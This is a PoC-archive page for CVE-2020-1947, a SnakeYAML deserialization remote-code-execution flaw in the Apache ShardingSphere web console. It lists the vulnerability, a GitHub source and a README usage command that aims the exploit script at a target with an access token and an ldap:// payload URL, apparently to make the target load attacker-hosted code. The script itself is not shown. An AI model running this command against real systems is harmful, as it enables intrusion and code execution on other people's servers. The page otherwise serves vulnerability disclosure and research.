Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-1947 PoC — Apache ShardingSphere 代码问题漏洞

Source
https://github.com/wsfengfan/CVE-2020-1947
Associated Vulnerability
Title:Apache ShardingSphere 代码问题漏洞 (CVE-2020-1947)
Description:In Apache ShardingSphere(incubator) 4.0.0-RC3 and 4.0.0, the ShardingSphere's web console uses the SnakeYAML library for parsing YAML inputs to load datasource configuration. SnakeYAML allows to unmarshal data to a Java type By using the YAML tag. Unmarshalling untrusted data can lead to security flaws of RCE.
Description
CVE-2020-1947 Python POC
Readme
# CVE-2020-1947

```
usage: CVE-2020-1947.py [-h] -i IP -p PORT -T ACCESS_TOKEN -poc POC

python CVE-2020-1947.py -i 192.168.128.135 -p 8088 -T eyJ1c2VybmFtZSI6ImFk******* -poc ldap://127.0.0.1:1389/CommandObject

```
File Snapshot

 [4.0K]  /data/pocs/2551f6051424634b45fc68b6ca835d09d948afa2
├── [1.6K]  CVE-2020-1947.py
└── [ 218]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →